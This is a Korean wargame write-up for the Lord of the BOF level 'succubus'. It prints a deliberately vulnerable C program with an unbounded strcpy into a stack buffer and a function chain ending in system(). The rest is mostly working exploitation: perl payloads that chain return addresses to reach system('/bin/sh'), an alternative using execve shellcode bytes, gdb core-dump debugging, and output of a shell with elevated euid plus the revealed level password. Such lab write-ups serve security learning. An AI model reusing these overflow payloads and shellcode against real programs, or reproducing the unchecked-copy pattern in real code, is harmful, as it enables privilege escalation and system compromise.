

zombie_assassin to succubus

소스를 보자.

 

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - succubus

        - calling functions continuously

*/

 

#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>    // dumpcode 추가되어 있음

 

// the inspector   //검사자

int check = 0; 

 

/*
 * Final stage of the chain.  Proceeds only when every earlier stage has
 * run in order (check == 4); any other value terminates the process.
 * cmd is handed to system() unchanged, so this function performs no
 * validation of the command it executes -- the caller is trusted entirely.
 */
void MO(char *cmd)
{
        if (check == 4) {
                printf("welcome to the MO!\n");
                // olleh!
                system(cmd);
                return;
        }
        exit(0);
}

 

/* Fourth stage: requires GUL to have run (check == 3), then advances to 4. */
void YUT(void)
{
        if (check == 3) {
                printf("welcome to the YUT!\n");
                check = 4;
        } else {
                exit(0);
        }
}

 

/* Third stage: requires GYE to have run (check == 2), then advances to 3. */
void GUL(void)
{
        int ready = (check == 2);

        if (!ready) {
                exit(0);
        }
        printf("welcome to the GUL!\n");
        check = 3;
}

 

/* Second stage: requires DO to have run (check == 1), then advances to 2. */
void GYE(void)
{
        if (check == 1) {
                printf("welcome to the GYE!\n");
                check = 2;
                return;
        }
        exit(0);
}

 

/* First stage: unconditionally starts the chain by setting check to 1. */
void DO(void)
{
        check = 1;
        fputs("welcome to the DO!\n", stdout);
}

 

/*
 * Entry point.  Copies argv[1] into a 40-byte stack buffer with an
 * unbounded strcpy() after checking only two properties of the input:
 * it contains no 0x40 byte, and bytes 44..47 equal the address of DO().
 * The copy is never length-checked, so an argv[1] longer than the buffer
 * overwrites the adjacent stack (CWE-121).  Afterwards most of the stack
 * around the frame is zeroed through absolute-address memset() calls.
 * Pre-C99 style: implicit int return type, and strchr/memcmp/strcpy/memset
 * are used without including <string.h>.
 */
main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // you cannot use library
        // Exits if argv[1] contains the byte 0x40 anywhere.  (Author's note:
        // this blocks supplying library addresses, i.e. return-to-libc.)
        if(strchr(argv[1], '\x40')){
                printf("You cannot use library\n");
                exit(0);
        }

        // check address
        // Store DO's address, then require bytes 44..47 of argv[1] to equal
        // the 4-byte in-memory representation of that pointer.  Note that
        // argv[1]'s length is not checked first, so a short argument makes
        // memcmp read past its terminator.
        addr = (char *)&DO;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with DO\n");    // exit when it differs
                exit(0);
        }

        // overflow!
        // vuln: no bound on the copy; buffer holds 40 bytes.
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // stack destroyer
        // 100 : extra space for copied argv[1]
        // Zero the first 44 bytes (author's note: buffer + saved frame
        // pointer), then everything from buffer+148 up to 0xbfffffff.
        // Pointer arithmetic outside the array and the hard-coded 32-bit
        // stack top are undefined behaviour / platform-specific.
        memset(buffer, 0, 44);
        memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

        // LD_* eraser
        // 40 : extra space for memset function
        // Zero 2960 bytes below buffer as well (author's note: clears the
        // shared-library / LD_* area); same UB caveat as above.
        memset(buffer-3000, 0, 3000-40);
}

 

이번 문제는 일단

1. ret에 DO함수 주소가 와야 한다.

2. argv[1]에 \x40 불가, library 사용 불가

3. ret 이후의 100byte 사용 가능

4. 공유 라이브러리 사용 불가

5. MO함수의 system(cmd)

5가지 조건이 보인다.

 

이것으로 공격 방법을 추측해 보자면,

일단 DO함수를 불러온 다음 차례로 GYE, GUL, YUT, MO를 불러와 MO 함수의 인자로 /bin/sh를 주는 방법과,

DO함수를 불러온 다음 DO함수의 RET에 shellcode(\x40 없는) 주소를 주는 방법, 2가지가 있겠다.

 

1번방법

 

payload

[x*44][&DO][&GYE][&GUL][&YUT][&MO][aaaa][&"/bin/sh"]["/bin/sh"]

 

공격!

[zombie_assassin@localhost zombie_assassin]$ cat succubus_1.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - succubus

        - calling functions continuously

*/

 

#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>

 

// the inspector

int check = 0;

 

/*
 * Final stage of the chain.  Runs only when every earlier stage has been
 * visited in order (check == 4); otherwise the process exits.  cmd is
 * passed to system() without any validation.  This copy of the program
 * additionally hex-dumps 64 bytes at cmd after the shell returns; the
 * write-up's author added it to see what string actually reached MO.
 */
void MO(char *cmd)
{
        if (check == 4) {
                printf("welcome to the MO!\n");
                // olleh!
                system(cmd);
                // debugging aid (dumpcode.h): show 64 bytes at cmd
                dumpcode((char*)cmd, 64);
                return;
        }
        exit(0);
}

 

/* Fourth stage: requires GUL to have run (check == 3), then advances to 4. */
void YUT(void)
{
        int ready = (check == 3);

        if (!ready) {
                exit(0);
        }
        printf("welcome to the YUT!\n");
        check = 4;
}

 

/* Third stage: requires GYE to have run (check == 2), then advances to 3. */
void GUL(void)
{
        if (check == 2) {
                printf("welcome to the GUL!\n");
                check = 3;
        } else {
                exit(0);
        }
}

 

/* Second stage: requires DO to have run (check == 1), then advances to 2. */
void GYE(void)
{
        if (check == 1) {
                printf("welcome to the GYE!\n");
                check = 2;
                return;
        }
        exit(0);
}

 

/* First stage: unconditionally starts the chain by setting check to 1. */
void DO(void)
{
        check = 1;
        fputs("welcome to the DO!\n", stdout);
}

 

/*
 * Entry point.  Copies argv[1] into a 40-byte stack buffer with an
 * unbounded strcpy() after checking only two properties of the input:
 * it contains no 0x40 byte, and bytes 44..47 equal the address of DO().
 * The copy is never length-checked, so an argv[1] longer than the buffer
 * overwrites the adjacent stack (CWE-121).  Afterwards most of the stack
 * around the frame is zeroed through absolute-address memset() calls.
 * Pre-C99 style: implicit int return type, and strchr/memcmp/strcpy/memset
 * are used without including <string.h>.
 */
main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // you cannot use library
        // Exits if argv[1] contains the byte 0x40 anywhere.
        if(strchr(argv[1], '\x40')){
                printf("You cannot use library\n");
                exit(0);
        }

        // check address
        // Bytes 44..47 of argv[1] must equal the 4-byte in-memory
        // representation of DO's address.  argv[1]'s length is not checked
        // first, so a short argument makes memcmp read past its terminator.
        addr = (char *)&DO;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with DO\n");
                exit(0);
        }

        // overflow!
        // No bound on the copy; buffer holds 40 bytes.
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // stack destroyer
        // 100 : extra space for copied argv[1]
        // Zero the first 44 bytes, then everything from buffer+148 up to
        // 0xbfffffff.  Pointer arithmetic outside the array and the
        // hard-coded 32-bit stack top are undefined behaviour / platform-specific.
        memset(buffer, 0, 44);
        memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

        // LD_* eraser
        // 40 : extra space for memset function
        // Also zero 2960 bytes below buffer; same UB caveat as above.
        memset(buffer-3000, 0, 3000-40);
}

[zombie_assassin@localhost zombie_assassin]$ bash2           //bash2 쉘을 켜준다 (/bin/sh 주소에 \xff가 들어가 있어서)

[zombie_assassin@localhost zombie_assassin]$ ./succubus_2 `perl -e 'print "x"x44,"\xfc\x87\x04\x08","\xcc\x87\x04\x08","\x9c\x87\x04\x08","\x6c\x87\x

04\x08","\x34\x87\x04\x08","aaaa","\x68\xfc\xff\xbf","/bin/sh"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx??쐡l?4?aaaah??bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

Illegal instruction (core dumped)        //core dump가 생겼다.

[zombie_assassin@localhost zombie_assassin]$ gdb -q succubus_2 core     //core 파일을 이용해 디버깅해 보자

Core was generated by `                                                                              '.

Program terminated with signal 4, Illegal instruction.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x8048735 in MO ()

(gdb) x/12x $esp

0xbffffc60:     0x61616161      0xbffffc68      0x6e69622f      0x0068732f       //주소가 제대로 들어간 것을 확인할 수 있다.

0xbffffc70:     0x08048818      0x00000002      0xbffffc94      0x0804839c      //segment fault가 발생하는 이유는 알 수 없다. MO함수의 exit 주소에서 발생..

0xbffffc80:     0x0804895c      0x4000ae60      0xbffffc8c      0x40013e90

(gdb) quit

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04

\x08","\x24\x87\x04\x08","aaaa","\x68\xfc\xff\xbf","/bin/sh"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?펶뙁\?$?aaaah??bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ id

uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zombie_assassin)

bash$ my-pass

euid = 517

here to stay

 

 

2번째 공격

 

payload

[x*44][&DO][&shellcode][shellcode]

 

공격!

[zombie_assassin@localhost zombie_assassin]$ ./succubus_2 `perl -e 'print "x"x44,"\xfc\x87\x04\x08","\x68\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\

x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?h??픐h//shh/bin됥PS됣1

                                                                        ?

welcome to the DO!

Segmentation fault (core dumped)     //core dump생성

[zombie_assassin@localhost zombie_assassin]$ gdb -q succubus_2 core

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffc68 in ?? ()   //segment fault가 우리가 지정한 쉘코드 주소에서 난 것을 알 수 있음. 쉘코드 위치가 잘못됨.

(gdb) x/12x $esp

0xbffffc54:     0x6850c031      0x68732f2f      0x69622f68      0x50e3896e     //쉘코드 시작위치 확인

0xbffffc64:     0x31e18953      0xcd0bb0d2      0x08040080      0x08048818

0xbffffc74:     0x00000002      0xbffffc94      0x0804839c      0x0804895c

(gdb) quit

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x54\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?T??픐h//shh/bin됥PS됣1

                                                                        ?

welcome to the DO!

Segmentation fault    //쉘코드 위치를 고치고 공격해 봤지만 먹히지 않음

[zombie_assassin@localhost zombie_assassin]$ ./succubus_2 `perl -e 'print "x"x44,"\xfc\x87\x04\x08","\x54\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\

x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?T??픐h//shh/bin됥PS됣1

                                                                        ?

welcome to the DO!

bash$ quit

sh: quit: command not found

bash$ exit              //succubus_2에서는 잘됨...

exit

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x54\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?T??픐h//shh/bin됥PS됣1

                                                                        ?

welcome to the DO!

Segmentation fault

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x50\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?P??픐h//shh/bin됥PS됣1

                                                                        ?

welcome to the DO!

Illegal instruction

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x58\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?X??픐h//shh/bin됥PS됣1

                                                                        ?

welcome to the DO!

Segmentation fault

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x5c\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?\??픐h//shh/bin됥PS됣1

                                                                        ?

welcome to the DO!

Segmentation fault

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "x"x44,"\xec\x87\x04\x08","\x64\xfc\xff\xbf","\x31\xc0\x50\x68\x2f\x2f\x73\x6

8\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?d??픐h//shh/bin됥PS됣1

                                                                        ?

welcome to the DO!

bash$ id

uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zombie_assassin)

bash$ my-pass

euid = 517

here to stay
